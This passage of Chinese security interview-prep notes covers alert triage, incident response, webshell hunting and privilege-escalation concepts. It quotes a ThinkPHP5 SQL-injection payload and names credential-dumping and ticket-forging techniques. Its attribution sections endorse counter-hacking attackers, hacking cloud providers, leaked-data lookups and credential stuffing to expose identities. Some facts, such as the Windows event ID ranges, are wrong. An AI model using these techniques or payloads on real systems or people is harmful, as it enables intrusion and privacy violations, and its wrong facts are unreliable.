時間延遲：攻擊者可能會在惡意SQL語句中添加時間延遲語句，以便測試數據庫的響應時間，從而獲取敏感信息。
數據庫操作：SQL注入攻擊可以讓攻擊者執行未經授權的數據庫操作，例如刪除、修改、添加數據等。
為了判斷SQL注入攻擊是否成功，可以注意以下幾點：
檢查Web應用程序的日志和錯誤提示信息，是否包含異常的SQL語句和錯誤信息。
檢查數據庫的日志，是否存在異常的數據庫操作記錄。
檢查Web應用程序的用戶數據和操作結果，是否存在異常情況，例如修改、刪除、添加了未經授權的數據。
進行代碼審計，檢查Web應用程序的代碼是否存在漏洞，例如沒有對輸入參數進行充分的過濾和驗證。

原理（口頭語言）：用戶的輸入嵌入到SQL語句中，然后被當做代碼執行
成因：未對用戶輸入的數據做驗證或者處理（預編譯）
可有看設備報警，SQL注入的報警，能看到攻擊時間，攻擊ip，payload，如何判斷是誤報還是真是攻擊，如果是真實攻擊，怎么判斷他攻擊是否成功，如果成功怎么處理
先看ip，如果ip是公司內部的再看內部人員有沒有相關操作，如果不是公司人員業務的操作那就是攻擊了，
然后分析payload,分析它寫的payload安全設備能否它進行過濾攔截，如果它確實能繞過，那就應該攻擊成功了，
成功的話趕緊上報，做應急響應，做出相應處理，添加過濾規則，修改數據庫中能修改的數據比如管理員賬號密碼啥的

幾萬條告警，怎么快速找到攻擊成功的告警,哪些是誤報

要把告警日志數據轉換為情報數據進行輸出分析 告警日志數據主要來自：WAF、IPS「入侵防御系統」、IDS「入侵防御系統」、蜜罐、NTA、EDR、APT、防病毒、堡壘機、態勢感知等安全設備。大多數企業按照自己的需求安裝了安全設備提升了自身的感知攻擊威脅的能力，但是也正因為如此導致了單日的安全設備告警日志量會變得很多，但是*這些數據不一定就是真實有效的攻擊所觸發的，也有可能是因為安全設備檢測特征規則感知到嘗試攻擊行為所造成的風險告警；真實有效的攻擊也有可能被淹沒在里面；為了能夠降低分析成本，就需要對這類因“攻擊嘗試行為“大量觸發的風險告警進行數據清洗。通過特征規則將無效告警、誤報告警過濾掉，剩下的就是“待分析告警”; 網絡之中的例子 —“哪些告警屬于無效告警？” 比如說：攻擊方通過對目標資產所處的C段進行批量掃描，但C段的資產并非都是處于「活躍」狀態，甚至根本沒有這個資產。而安全設備還是因為這個「攻擊嘗試行為」產生了告警，那么這種告警就屬于「無效告警」。—“怎么判斷告警是誤報？” 比如說：攻擊方嘗試利用現成的「EXP&POC集成腳本工具」對資產目標進行檢測掃描，安全設備檢測到「攻擊嘗試行為」中的攻擊特征就會產生告警。在通常情況下，可以把告警中的URL的“網頁狀態碼”、“頁面回顯數據”作為「誤報告警」判斷的條件之一。—“如何對「待分析告警」關聯分析？” 從「待分析告警」中提取攻擊特征，通過「攻擊特征規則庫」進行匹配，看能否獲取到「情報線索」。/index/index/index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 ** 比如說，在「待分析告警」數據發現這一段Payload，通過「攻擊特征規則庫」關聯到它屬于「ThinkPHP5 - 注入漏洞」。但我們通過「資產指紋信息庫」進行核查發現「受攻擊的資產」并沒有使用「ThinkPHP5」框架。按照這個分析邏輯，將整個流程腳本化輸出。就可以排除「待分析告警」中那些真實的攻擊嘗試行為，卻又未攻擊成功的告警。然后，人工再對剩余的少量「待分析告警」進行分析研判，從其中捕獲到「真實有效」的攻擊事件的可能性相對于以往的分析方式會大的多。如果捕獲到「真實有效」的攻擊事件，還可以利用「資產指紋信息庫」巡查具有同樣指紋特征的設備是否也存在類似的漏洞。安全設備進行報警如何看是否是外界的攻擊，即是否是誤報，或是內部人員進行的操作：查看報警日志，對報警的數據進行分析，看是不是內部人員的操作，還是真實的攻擊
流量分析是否是誤報：分析流量數據包，可以用wireshark，分析流量是不是正常的業務操作。

如果看到一個告警ip，如何判斷是否是真實攻擊？

首先，我會先判斷一下ip來源，判斷是內網ip還是公網ip，若為內網ip，然后對請求包的內容是否存在惡意payload，然后再根據響應包內容有執行成功的回顯，若相應包中有對應的payload的回顯，則可以判斷為攻擊成功，但是此時，需要判斷下是否為業務系統的邏輯造成的和是否是工作人員在測試業務系統漏洞，若工作人員證實了該告警為自家安全ip，則認為該攻擊為誤報，若非自家ip且不存在邏輯因素，則可判斷為內網攻陷。若為公網ip，若惡意payload利用成功，則可判斷為真實攻擊。

如果看到一條sql注入告警，怎么判斷是否是攻擊成功？

對請求包的內容進行檢查，檢查是否存在sql注入的利用語句，同時檢查響應包內容有執行成功的回顯，若相應包中存在sql注入攻擊成功的回顯，則可判斷攻擊成功。

文件上傳的攻擊特征是什么

文件上傳首先是POST的數據包，且content-type為multipart/form-data，如果為惡意的文件上傳漏洞攻擊，則數據包中filename屬性的后綴為jsp,php,asp等惡意后綴，且文件內容一般為Webshell內容

怎么通過流量分析 ，判斷出對方攻擊成功了？

1. 可以通過返回包判斷攻擊是否成功，比如命令執行攻擊有回顯的話返回包就會有命令執行的結果。如果有一些安全設備的話也可以通過查看告警信息判斷。
2. 可以對請求包進行重放來判斷，在自己的機器上重放流量包，將 payload 改成自己的 payload 來判斷是否攻擊成功

如果攻擊的回顯有延遲或者說攻擊生效需要一定的時間你不能很快看見 ，那該怎么通過流量分析判斷出攻擊是否生效了？

重放流量包，將 payload 改成自己的來進行判斷。

struts2命令執行的流量特征

一般Struts2框架的接口會以.do、.action結尾；struts2一些常見的關鍵字：memberAcecess,getRuntime,println,雙引號，單引號，等號，括號之類的符號。

四、內網相關面試題

Windows和Linux提權的方法

1. Windows：內核漏洞、可修改的服務、服務路徑缺陷、可修改的計劃任務、psexec、bybassuac
2. Linux：suid、定時任務、內核漏洞、sudoer

Windows系統提權的思路

提權可分為縱向提權與橫向提權：縱向提權：低權限角色獲得高權限角色的權限；橫向提權：獲取同級別角色的權限。

方法：  1.系統內核溢出漏洞提權  2.數據庫提權  3.錯誤的系統配置提權  4.組策略首選項提權  5.WEB中間件漏洞提權  6.DLL劫持提權  7.濫用高危權限令牌提權  8.第三方軟件/服務提權等

Linux有哪些提權思路

常用的就內核提權、sudo濫用提權、suid提權、一些高權限運行的應用服務提權，例如mysql、python、vi、定時任務提權、etc/passwd濫用提權

方法：1.Linux內核漏洞提權2.低權限用戶目錄下可被Root權限用戶調用的腳本提權（SUID）3.環境變量劫持高權限程序提權4.sudoer配置文件錯誤提權

說一下Linux利用passwd提權

這個需要對passwd有寫入權限，正常root用戶的uid為0，如果自己寫進去一個用戶把它的uid改為0的話，用這個用戶登錄，系統就會切到root用戶了

suid提權的原理

通過文件屬主的身份運行文件

bypassuac的方法

白名單、COM 接口、Shell API，也可以通過工具UACME

黃金白銀票據

1. 黃金票證是一種權限維持手段，攻擊者獲得了對 AD 密鑰分發服務帳戶的控制權，并使用該帳戶偽造 TGT，便能夠訪問 域上的任何資源。
2. 白銀票據是偽造的 TGS 票證，白銀票僅允許攻擊者偽造特定服務的 TGS 票據。

詳細講一下金票以及需要的信息

AS認證中返回的TGT是由krbtgt用戶的密碼Hash加密的，有krbtgt的密碼hash就可以自己制作任意的TGT
需要域名、域SID、要模擬的用戶名、krbtgt的hash

讀hash讀取不到怎么辦

用工具把lsass進程dump下來，然后本地去讀，或者轉儲sam文件，AD數據庫的話可以用dcsync的方式轉出來

dcsync的利用條件

需要配置兩個ACL的權限就可以了

詳細講一下ACL

ACL就是訪問權限，windows下不同的用戶組有默認的ACL配置，你也可以單獨添加權限，這樣就算普通用戶也可以給他添加向域管組添加用戶的權限

psexec和wmic區別

psexec會有大量的日志，wmic就不會

PTT有哪些攻擊方法

MS14-068、金票、銀票

內網掃描的方式

內網fscan掃描 或者 搭建內網socks5代理然后走代理進行掃描

Liunx系統中任何權限都能訪問的臨時文件位置

答：/var/tmp

正向代理 反向代理的區別啊

正向代理和反向代理是兩種不同的代理服務器架構。
正向代理（Forward Proxy）是代理服務器位于客戶端與目標服務器之間的一種代理方式。客戶端發送請求時，先將請求發送到代理服務器，然后代理服務器再將請求發送到目標服務器。在這個過程中，客戶端并不知道請求是由代理服務器發出的，只知道代理服務器的地址。正向代理常用于客戶端無法直接訪問目標服務器的情況下，比如防火墻的限制、訪問限制等。
反向代理（Reverse Proxy）是代理服務器位于目標服務器與客戶端之間的一種代理方式。客戶端發送請求時，請求先到達反向代理服務器，然后由反向代理服務器將請求轉發到目標服務器，目標服務器將響應發送給反向代理服務器，最后再由反向代理服務器將響應發送給客戶端。在這個過程中，客戶端不知道請求是由目標服務器響應的，只知道反向代理服務器的地址。反向代理常用于負載均衡、緩存、安全等方面。
在實際應用中，常常使用反向代理作為Web服務器的入口，來處理負載均衡、安全過濾、緩存等問題；同時使用正向代理來提高用戶體驗，隱藏客戶端真實IP地址，保護隱私等

五、應急響應面試題

1.內存馬應急(重點)

內存馬有幾種類型

內存馬是一種在受感染的主機內存中運行的惡意軟件。一般來說，內存馬可以分為以下幾種類型：
注入型內存馬：通過利用漏洞將惡意代碼注入到正常進程中，從而在內存中運行。
自執行型內存馬：將惡意代碼寫入自啟動項，啟動后自動運行。
進程注入型內存馬：利用進程注入技術，在受感染進程的內存中運行惡意代碼。
Hook型內存馬：利用Windows API的Hook機制，修改進程中的關鍵函數，從而運行惡意代碼。
要判斷內存馬的類型，可以使用反病毒軟件或專門的安全工具對受感染主機進行掃描和分析。一般來說，不同類型的內存馬會留下不同的痕跡和特征，比如某些進程的不正常行為、異常的網絡連接等等。
針對不同類型的內存馬，處理方法也會有所不同。一般來說，可以采取以下措施：
注入型內存馬：修復漏洞、升級軟件，加強網絡安全防護等方法來預防類似攻擊；對已經感染的主機，可以通過殺掉受感染進程或卸載惡意程序等方式來清除內存馬。
自執行型內存馬：可以通過清理自啟動項、卸載惡意程序等方式來清除內存馬。
進程注入型內存馬：可以通過殺掉受感染進程或卸載惡意程序等方式來清除內存馬。
Hook型內存馬：可以通過還原Hook、修復關鍵函數、殺掉受感染進程或卸載惡意程序等方式來清除內存馬。

內存馬你怎么查殺**

內存馬如何排查：如果發現了一些內存webshell的痕跡，需要有一個排查的思路來進行跟蹤和分析，也是根據各類型的原理，
列出一個排查思路——1、如果是jsp注入，日志中排查可以jsp的訪問請求。
2、如果是代碼執行漏洞，排查中間件的error.log,查看是否有可疑的報錯，判斷注入時間和方法。
3、根據業務使用的組件排查可能存在的java代碼執行漏洞，spring的controller了類型的話根據上報webshell的url查找日志，filter或者listener類型，可能會有較多的404但是帶有參數的請求。
殺馬：
終止進程：如果確認某個進程是內存馬，可以嘗試終止該進程。在Windows系統中，可以通過任務管理器或者命令行工具taskkill來終止進程；在Linux系統中，可以通過命令行工具kill或者pkill來終止進程。
刪除文件：如果進程終止后，還需要刪除相關的文件，以防止內存馬重新啟動。在Windows系統中，可以直接刪除相關文件；在Linux系統中，需要先終止進程，然后再刪除文件。

怎么排查java內存馬

直接利用內存馬檢測工具去找，github也有很多檢測腳本，手工的話可以分析web日志，filter或者listener類型的內存馬，會有大量路徑相同參數不同的url請求，或者頁面不存在但是返回200的請求，分析web.xml文件，內存馬的Filter是動態注冊的，web.xml是沒有配置的，也有可能是中間件漏洞通過代碼執行加載內存馬，這就可以去排查中間件的錯誤日志，像哥斯拉和冰蝎的內存馬也會有跟webshell相似的特征，分析特殊的classloader加載，攻擊者喜歡利用TemplatesImpl和bcel加載內存馬，因為內存馬是駐留在內存里的，本地無class文件，通過檢測Filter對應的ClassLoader目錄下是否存在class文件來判斷，也可以把內存中所有的Filter的class dump出來，使用工具分析是否存在惡意代碼

2.溯源

溯源反制

1. 通過 ip 定位物理位置，對 ip 進行端口掃描，進行反滲透
2. 通過社交 ID 進行追蹤
3. 通過 ip 查域名、查郵箱、電話，對域名進行溯源分析
4. 如果有惡意樣本，可通過分析惡意樣本，看是否存在攻擊者信息
5. 通過蜜罐進行反制
6. 也可以進行反釣魚

溯源有哪些思路

通過分析設備的告警、釣魚郵件、木馬病毒找到攻擊者IP，先去一些威脅情報平臺搜索相關信息，判斷攻擊者為代理服務器還是跳板機還是國內的云服務器，查一查相關注冊信息，對攻擊者進行反向滲透，針對攻擊者去搭建蜜罐，如果是云服務器，可以尋找到相關廠商，聯系客服說自己忘記密碼了，看看能不能獲取到云服務器購買者信息，對于獲取到的信息可以通過各種社工庫搜一搜，各大搜索引擎去搜索看看能不能獲取到更多信息，也可以直接把服務器廠商打下來，肯定就可以知道購買者的信息了，如果把跳板機拿下就可以去查看桌面的敏感信息，登錄日志，歷史執行命令這樣一步一步去獲取更多的信息。

你會用什么辦法溯源攻擊方的個人信息呢

1. 首先通過日志和蜜罐等方式獲取到攻擊方的 ip，可以對 ip 進行反向滲透獲取信息，定位攻擊者信息。
2. 也可以通過搜索引擎或者安全情報，獲取 ip 對應攻擊者的網名id，再通過社交平臺獲取攻擊者的信息
3. 通過攻擊 IP 歷史解析記錄/域名，對域名注冊信息進行溯源分析
4. 如果攻擊者有種植木馬等，可以提取樣本特征如用戶名、ID、郵箱、C2 服務器等信息—同源分析
5. 搭載 jsonp 釣魚的蜜罐，通過 JSONP 跨域，獲取攻擊者的主機信息、瀏覽器信息、真實 IP 及社交信息等

怎么做溯源，國外ip怎么溯源，國內ip怎么溯源

溯源思路：首先通過系統日志、安全設備截獲攻擊包等從中分析出攻擊者的ip和攻擊方式，通過webshell或者木馬去微步分析，
或者去安恒威脅情報中心進行ip檢測分析，是不是云服務器，基站等，如果是云服務器的話可以直接反滲透，看看開放端口，域名，whois等進行判斷，
獲取姓名電話等丟社工庫看看能不能找到更多信息然后收工
針對國外IP的溯源方法：
使用網絡安全工具進行溯源：可以使用網絡安全工具，如traceroute、ping等命令，對目標IP進行探測和跟蹤。這些工具可以顯示出攻擊流量經過的路由器、網關和ISP等信息，幫助我們了解攻擊流量的來源地點。
查找域名信息：通過WHOIS查詢工具查詢目標域名的注冊信息，包括注冊人、注冊機構、聯系方式等信息，可以從中了解到攻擊來源的大致位置。
聯系當地ISP：如果攻擊者使用的是公共網絡，如酒店、咖啡廳、機場等，可以聯系當地ISP，尋求協助獲取攻擊來源的信息。

針對國內IP的溯源方法：

使用網絡安全工具進行溯源：同樣可以使用traceroute、ping等命令進行溯源，顯示攻擊流量經過的路由器和ISP等信息，幫助我們確定攻擊來源的大致位置。
查找公網IP地址：通過IP地址查詢工具查詢目標IP的公網IP地址，可以從中了解到攻擊來源的大致位置。
聯系當地ISP：如果攻擊者使用的是公共網絡，如網吧、公共WiFi等，可以聯系當地ISP，尋求協助獲取攻擊來源的信息。

有沒有接觸過溯源反制啊

溯源反制的原理主要是通過混淆和偽裝攻擊流量，防止攻擊者獲取真實的攻擊來源和行為信息。具體操作包括：
使用代理服務器：通過使用代理服務器，可以改變攻擊流量的來源IP地址，使得攻擊者無法追蹤真實的攻擊來源。
使用VPN技術：VPN技術可以在公網上建立一個私有網絡，加密傳輸數據流量，從而防止攻擊者獲取敏感信息。
使用匿名瀏覽器：匿名瀏覽器可以隱藏用戶真實的IP地址和瀏覽痕跡，使得攻擊者無法追蹤用戶的真實身份和行為。
使用虛假數據：在攻擊流量中混入虛假的數據，如虛假的IP地址、協議和端口等信息，可以混淆攻擊者的追蹤。

已知攻擊者IP，如何溯源定位攻擊人員？

1、IP反查注冊信息，可能會查詢到域名，通過域名查詢備案和whois信息，可能會查出郵箱電話，通過社工庫查詢相關郵箱和電話信息定位人員支付寶，微信轉賬；微博，百度貼吧等
2、通過白澤系統查詢IP標記情況，查看攻擊者IP日常訪問數據內容，判斷攻擊者人員信息

溯源會用些什么工具或者在線網站，都可以說說常用的服務和對應的端口

查入侵IP，入侵手法（網路攻擊事件）的確定等
工具：可以用wireshark進行溯源取證；
Wireshark：Wireshark 是一款免費開源的網絡協議分析工具，可以捕獲和分析網絡數據包。通過使用 Wireshark，您可以追蹤網絡數據流和操作記錄，了解數據的來源、目的和內容等信息。 Sysinternals Suite：Sysinternals Suite 是一組 Windows 系統工具集合，其中包括了很多用于溯源的工具。例如，Process Monitor 可以監視 Windows 系統中的進程和操作記錄，用于追蹤應用程序和系統資源的使用情況；Regmon 可以監視系統注冊表的操作記錄，用于追蹤應用程序對系統注冊表的讀寫操作。 SIFT：SIFT（SANS Investigative Forensic Toolkit）是一款專業的數字取證工具集，用于支持取證人員對數字媒體進行取證分析。SIFT 包含了很多工具，例如，Autopsy 可以分析磁盤映像文件，Volatility 可以分析內存映像文件，用于追蹤系統的操作記錄和數據流。 Sleuth Kit：Sleuth Kit 是一款開源的數字取證工具集，提供了一系列用于分析文件系統和磁盤映像文件的工具。例如，fls 工具可以分析文件系統中的文件記錄，用于追蹤文件的創建、修改和刪除記錄；mactime 工具可以分析文件系統中的時間戳記錄，用于追蹤文件的時間戳信息。 在線網站：微步* 安恒威脅情報中心 全國互聯網違法和不良信息舉報中心 工業和信息化部網絡安全管理局
溯源思路：首先通過系統日志、安全設備截獲攻擊包等從中分析出攻擊者的ip和攻擊方式，通過webshell或者木馬去微步分析，
或者去安恒威脅情報中心進行ip檢測分析，是不是云服務器，基站等，如果是云服務器的話可以直接反滲透，看看開放端口，域名，whois等進行判斷，
獲取姓名電話等丟社工庫看看能不能找到更多信息然后收工

應急響應要干什么啊

應急響應通常包括以下步驟：
確認安全事件：要及時發現安全事件，快速確認其類型、范圍和危害程度，并進行預警和通報。
切斷攻擊鏈：要采取有效措施，盡可能快地切斷攻擊鏈，阻止攻擊擴散和進一步損失。
收集證據：要收集、保留安全事件相關的證據和信息，以便后續的調查和追蹤。
分析病毒特征：要對病毒、木馬等安全事件的特征進行分析，找出其入侵方式、攻擊目的、傳播途徑等信息，以便防止類似安全事件的再次發生。
應對措施：根據安全事件的類型和程度，采取相應的應對措施，如修補漏洞、清除惡意軟件、升級補丁、修改配置等。
恢復業務：在限制損失和消除安全風險的基礎上，盡快恢復業務，保障用戶和業務的正常運轉。
事件總結：要對安全事件的應急響應過程進行總結和反思，發現問題并進行改進，提高應急響應能力。
常見的應急響應事件分類：web入侵：網頁掛馬、主頁篡改、Webshell 系統入侵：病毒木馬、勒索軟件、遠控后門 網絡攻擊：DDOS攻擊、DNS劫持、ARP欺騙 網站被掛馬如何應急（具體流程都是差不多的，看著變）
1.取證，登錄服務器，備份，檢查服務器敏感目錄，查毒（搜索后門文件-注意文件的時間， 用戶，后綴等屬性），調取日志（系統，中間件日志，WAF日志等）；
2.處理，恢復備份（快照回滾最近一次），確定入侵方法（漏洞檢測并進行修復）
3.溯源，查入侵IP，入侵手法（網路攻擊事件）的確定等
4.記錄，歸檔--------預防-事件檢測-抑制-根除-恢復-跟蹤-記錄通用漏洞的應對等其他 安全應急事件

? 判斷威脅情報是否有誤，就看wireshark，進行流量分析判斷是否為正常業務操作

應急響應流程

收集信息：收集告警信息、客戶反饋信息、設備主機信息等
判斷類型：判斷攻擊的類型，是ddos還是被掛馬了還是被控制了
控制范圍：隔離目標網絡不讓危害擴大
尋找原因：還原攻擊者的攻擊鏈，溯源攻擊者的整個過程
修復防御：直接封掉攻擊者ip，對于產生的原因進行對應防御
恢復業務：將業務恢復正常
寫報告：總結整個過程，反思不足之處，優化應急方案

安全設備發現一臺Linux主機觸發挖礦告警，上機排查該機器執行ps，top命令未發現挖礦及惡意進程，現在懷疑ps，top命令被替換，動態鏈接庫被劫持，請問應該如何處理？**

1、使用cat /etc/ld.so.preload命令查看動態鏈接庫文件是否加載有so文件，提取加載的so文件上傳至威脅情報平臺，判斷是否為惡意so文件2、清除so文件，使用ldconfig命令重新加載動態鏈接庫，執行ps，top命令查看是否可以發現挖礦進程信息
3. 確認ps和top命令是否被替換：可以使用命令"which ps"和"which top"查看這兩個命令的路徑是否為系統默認路徑"/bin/ps"和"/usr/bin/top"，如果不是則說明被替換。也可以通過比較ps和top命令的md5值來判斷是否一致。2. 確認動態鏈接庫是否被劫持：可以使用命令"ldd /bin/ps"和"ldd /usr/bin/top"查看這兩個命令依賴的動態鏈接庫是否正常，如果有動態鏈接庫被替換，則會發現其中一些動態鏈接庫路徑不對
4. 恢復被替換的命令和動態鏈接庫：如果確認被替換，可以從系統安裝介質或官方網站上下載對應版本的ps和top命令和動態鏈接庫，替換掉被替換的文件即可。
5. 檢查系統安全：替換命令和動態鏈接庫只是暫時的措施，需要進一步排查系統安全狀況，比如查殺惡意程序、加強訪問控制、更新系統補丁等，以防止類似問題再次發生
6. 借助工具busybox

如何分析排查釣魚郵件事件？

1.確認郵箱批量發送時間點
2.排查郵箱登錄日志，發現【惡意IP】在【什么時間】通過web登錄成功;
3.查看郵件內容，確認釣魚郵件的影響和目的；
4.排查瀏覽器或上網行為，判斷是否訪問過釣魚頁面；
5.對訪問過的設備進行全盤查殺

分析郵件頭部：查看郵件的原始頭部信息
檢查發件人的真實地址、郵件服務器的來源、郵件傳輸路徑等
注意查看"Received"字段，查看是否存在異常的郵件轉發或代理
分析鏈接與附件，添加至黑名單
查看有多少內網ip訪問過這個鏈接或者ip，雙向排查

怎么排查 0day

1. 先對失陷的機器進行隔離，進行口令策略加固，封禁入侵IP
2. 排查 0day 流量，通過流量探針進行攻擊流量排查，同時分析下應用日志，重點看下異常報錯還有登錄的地方，還有url比較長，一看就不正常的
3. 還有就是異常文件，如果有異常文件，可以先分析后處理，然后回溯排查，拿不準的話可以取得經理同意后復現，進行加固，及時向waf寫規則

一臺機子失陷了，因業務需要不能斷網，怎么處理

1. 關閉ssh、rdp等允許遠程連接的協議端口
2. 看下外聯，有無可疑ip，若有對其進行封禁，或設置ip白名單，只能有所需要的ip才能訪問
3. 排查下有無文件遺留，通過 webshellkiller、D 盾、河馬之類的工具進行查殺
4. 查看下告警，根據告警事件點審計各類日志和流量，看看怎么打進來的進行加固

內網機子失陷，怎么做

1. 進行隔離、做好邊界控制
2. 查看進程、若存在可疑進程通過pid找到文件路徑，保留現場，經同意后干掉可疑進程和可疑文件
3. 通過可疑文件的創建時間定位到相應的應用日志位置，看看是怎么進來的，進行加固
4. 查看下定時任務有無可疑的
5. 看看有沒有可疑賬號存在
6. 確認下有沒有文件遺留
7. 使用后門查殺工具進行排查

linux的日志存放在哪個目錄下

Linux 的日志文件通常存儲在 /var/log 目錄下，這是一個系統和應用程序日志文件的默認存儲位置。不同的日志類型存儲在不同的子目錄下，以下是一些常見的子目錄和對應的日志類型： /var/log/messages：系統日志，包含了操作系統的各種信息、警告和錯誤等。 /var/log/auth.log：安全認證日志，記錄系統的用戶登錄、認證、授權等信息。 /var/log/syslog：系統日志的一個備份文件。 /var/log/kern.log：內核日志，記錄內核級別的信息，例如硬件故障等。 /var/log/dmesg：內核環緩存，包含啟動信息、硬件檢測和驅動程序的信息等。 /var/log/cron：定時任務日志，記錄定時任務執行的情況。 /var/log/maillog：郵件日志，包含了郵件服務器的日志信息。

win登錄日志怎么看，判斷是否登錄成功

事件查看器里面有windows日志文件，在下面安全性就可以看到很多日志，登錄成功的話就會有對應的事件id，登錄失敗就會有不同的事件id

windows事件ID一般是多少

Windows事件ID是用來標識不同事件類型的數字代碼。不同類型的事件有不同的事件ID，通常情況下，Windows系統的事件ID是在100到999之間的整數。例如，系統啟動時的事件ID為100，關機時的事件ID為200，應用程序錯誤的事件ID通常在1000以上。

需要注意的是，不同版本的Windows操作系統可能會有不同的事件ID編號范圍和對應的事件類型，因此在查看和分析Windows日志時，需要根據具體情況進行理解和處理。

Linux后門排查哪些東西

查看用戶信息相關的文件，看看有沒有多余的賬戶、特權賬戶、隱藏賬戶、可以遠程登錄的賬戶、sudo權限的賬戶，檢查一下網絡連接、異常進程，檢查定時任務、開機啟動、服務、端口、可疑的文件，檢查系統日志

Linux怎么查看程序調用了哪些文件

lsof -c 指定的程序，查看多個程序的話直接在后面加就可以

判斷自己是否給getshell（就是給用D盾查殺）

webshell：
查web日志，分析攻擊流量
掃webshell
排查網站目錄，查看最近更改的文件
shell：
查看未知端口，未知進程
排查惡意流量，鎖定感染進程
有安全設備就看安全設備

? 內網報警處理方式（可能會問的會不一樣，不會直接問）
首先就要是地位到具體的那一臺機器，既然報警那就說明知道了具體的漏洞類型，加相應的補丁打上，
以linux為主（一般都會問linux的），查看/var/log/secure系統日志，查看登錄失敗的記錄，還有Linux歷史命令–>home目錄的bash_histor，查看執行過的命令。
在利用webshell或者是shell查殺工具查殺，查看tmp目錄下是非有帶有免殺的木馬。徹底清除。再到全流量分析的機子上看，是非有經過其他的機器。
拿到攻擊ip之后到線上的一些網站查看主機類型，比如360或者微步上，查看是非是傀儡機，vps跳板，或者是國內個人云主機。
如果是個人云主機，就可以通過whois查看是非有最近綁定的域名，或者綁定者的郵箱。
知道郵箱之后就可以反查詢出qq號說多少，再利用社工查詢到手機號，
到一個知名的網站上查詢這個手機號有沒有注冊過什么網站，可以去這些網站通過撞庫的方法登入，這樣就可以拿到這個攻擊者的身份證，學校，地址這些了。
（思路是應急響應;加固;溯源）

? 被攻擊后日志文件或者木馬文件被刪除排查：lsof恢復被刪除的文件，然后查日志，查服務，查進程，查看是否有新增的賬號
安全設備進行報警如何看是否是外界的攻擊，即是否是誤報，或是內部人員進行的操作：查看報警日志，對報警的數據進行分析，看是不是內部人員的操作，還是真實的攻擊
流量分析是否是誤報：分析流量數據包，可以用wireshark，分析流量是不是正常的業務操作

? 服務中了webshell 怎樣從日志找webshell位置，被拿shell后怎么應急，怎樣快速定位shell
從日志流量文件開始，先定位位置查看敏感目錄tmp usr/sbin etc/ssh ，對新創建文件，修改文件等進行查看，找特殊權限文件比如777 。
流量的話從ua和playload去分析。比如菜刀連jsp木馬：第一個參數是a-q，這個是不會變的，第二個是編碼，第三個是playload。日志的話從找到的shell時間點去關聯分析，可以還原攻擊手法
快速定位就是看進程和內存看占用時間長和占用率高的

掛馬怎么排查啊（xss webshell）

確認是否被攻擊：可以通過檢查網站頁面源代碼、訪問日志、異常流量等方式，確定網站是否被攻擊。
分析攻擊方式：分析黑客攻擊方式，了解攻擊者的手段，比如是否是通過SQL注入、文件上傳漏洞等方式進行攻擊。
定位被攻擊的文件：查找被攻擊的文件，一般包括Web服務器的相關文件、網站源代碼、數據庫等，可以通過檢查文件的時間戳、比對文件的MD5值等方式進行確認。
清除惡意代碼：一旦確定被攻擊的文件，需要清除惡意代碼，可以手動清除或者使用工具進行清除。同時需要注意備份重要數據，以免誤操作導致數據丟失。
安全加固：排查完惡意代碼后，需要對系統進行加固，避免類似攻擊再次發生，可以使用一些安全工具或者參考安全加固手冊進行操作。
驗證清除結果：最后需要對系統進行全面驗證，確保清除工作的完整性和有效性，避免留下后門或者未發現的漏洞等問題。

webshell檢測思路

通過匹配特征碼，特征值，危險函數來查找webshell ，webshell如果傳到服務器了，在執行函數時這些對于系統調用、系統配置、數據庫、文件的操作動作都是可以作為判斷依據，Linux下就是nobody用戶起了bash,Windows下就是IIS User啟動 cmd，這些都是動態特征。再者如果黑客反向連接的話，那很更容易檢測了，Agent 和IDS都可以抓現行，Webshell總有一個 HTTP 請求，如果我在網絡層監控 HTTP，并且檢測到有人訪問了一個從沒訪問過的文件，而且返回了 200，則很容易定位到webshell。使用webshell一般不會在系統日志中留下記錄，但是會在網站的 web日志中留下webshell頁面的訪問數據和數據提交記錄

網頁被掛馬了，可能有哪些原因

服務器已經被拿下了、通過漏洞修改了前端文件、存儲型XSS、可能被上傳了木馬病毒

網站被掛馬如何應急

1.取證，登錄服務器，備份，檢查服務器敏感目錄，查毒（搜索后門文件-注意文件的時間， 用戶，后綴等屬性），調取日志（系統，中間件日志，WAF日志等）；
2.處理，恢復備份（快照回滾最近一次），確定入侵方法（漏洞檢測并進行修復）
3.溯源，查入侵IP，入侵手法（網路攻擊事件）的確定等
4.記錄，歸檔--------預防-事件檢測-抑制-根除-恢復-跟蹤-記錄通用漏洞的應對等其他 安全應急事件

分析日志用什么工具啊

使用日志分析工具，如LogForensics，Graylog，Nagios，ELK Stack等等

webshell殺了以后，還有外連流量怎么辦應急

如果殺掉Webshell后仍然有外連流量，可能存在以下情況：
Webshell仍在運行：在殺掉Webshell后，有可能仍然有外連流量，可能是因為Webshell并沒有被完全殺死。可以再次檢查系統進程，確認Webshell是否被殺死。
惡意程序已經感染其他系統：惡意程序可能已經感染了其他系統，通過其中的一個系統繼續進行攻擊。可以在網絡邊界設備上進行流量監測，檢查是否有大量的外連流量，確定是否有其他系統被感染。
攻擊者已經在系統中植入了后門：攻擊者可能已經在系統中植入了后門程序，通過后門程序繼續進行攻擊。可以在系統中查找可疑的后門程序或者系統服務，同時在網絡邊界設備上進行流量監測，檢查是否有異常的網絡流量。
緊急應對的方法可以包括以下步驟：
切斷網絡連接：如果發現外連流量很大，可以考慮切斷網絡連接，以防止惡意程序繼續進行攻擊。
查殺惡意程序：可以使用殺毒軟件或者安全工具對系統進行全面掃描，查殺惡意程序，并對系統進行修復。
清除后門和木馬：對于已經植入的后門和木馬程序，可以使用安全工具進行清除，或者通過手動查找和刪除的方式進行清除。
加強安全防護：對于被攻擊的系統，需要加強安全防護，包括更新補丁、強化口令、關閉不必要的服務等，以防止再次受到攻擊。
在利用webshell或者是shell查殺工具查殺，查看tmp目錄下是非有帶有免殺的木馬。徹底清除。再到全流量分析的機子上看，是非有經過其他的機器。
拿到攻擊ip之后到線上的一些網站查看主機類型，比如360或者微步上，查看是非是傀儡機，vps跳板，或者是國內個人云主機。
服務中了webshell 怎樣從日志找webshell位置，被拿shell后怎么應急，怎樣快速定位shell
從日志流量文件開始，先定位位置查看敏感目錄tmp usr/sbin etc/ssh ，對新創建文件，修改文件等進行查看，找特殊權限文件比如777 。
流量的話從ua和playload去分析。比如菜刀連jsp木馬：第一個參數是a-q，這個是不會變的，第二個是編碼，第三個是playload。日志的話從找到的shell時間點去關聯分析，可以還原攻擊手法
快速定位就是看進程和內存看占用時間長和占用率高的

入侵排查的流程

1、檢查系統賬號安全查看服務器是否有弱口令，遠程管理端口
